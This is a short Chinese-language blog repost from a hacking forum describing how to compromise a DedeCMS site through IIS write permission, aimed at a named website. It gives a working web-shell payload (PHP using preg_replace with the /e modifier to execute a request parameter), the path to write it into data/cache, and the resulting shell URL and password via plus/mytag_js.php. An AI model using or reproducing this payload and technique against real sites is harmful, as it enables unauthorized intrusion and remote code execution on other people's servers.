问题帖子:http://sb.f4ck.org/thread-16998-1-1.html
http://www.mrtl3.com/ 就是这个站是DEDECMS的, iis可写,但是却无法copy和move
IIS写入漏洞就不解释拉,可以写入txt,htm文件
等等。。。。。
能写入htm?
那岂不是能秒杀了,我记得看过相关文章
我们来看下plus/mytag_js.php代码
看懂了么 是包含data/cache/下的html
那么怎么利用呢
咱直接利用iis写权限向这个目录写html
新建个txt
内容为
<!–
document.write(“<?php echo ‘hacked by helen’;@preg_replace(‘/[copyright]/e’,$_REQUEST[‘sb’],’error’);?>”);
–>
然后用iis写权限工具写进去
写入的地址是:http://www.mrtl3.com/data/cache/mytag-250.htm
然后shell地址就是http://www.mrtl3.com/plus/mytag_js.php?aid=250 密码sb
转自:http://sb.f4ck.org/thread-16999-1-1.html
转载请注明:jinglingshu的博客 » 利用iis写权限搞定dede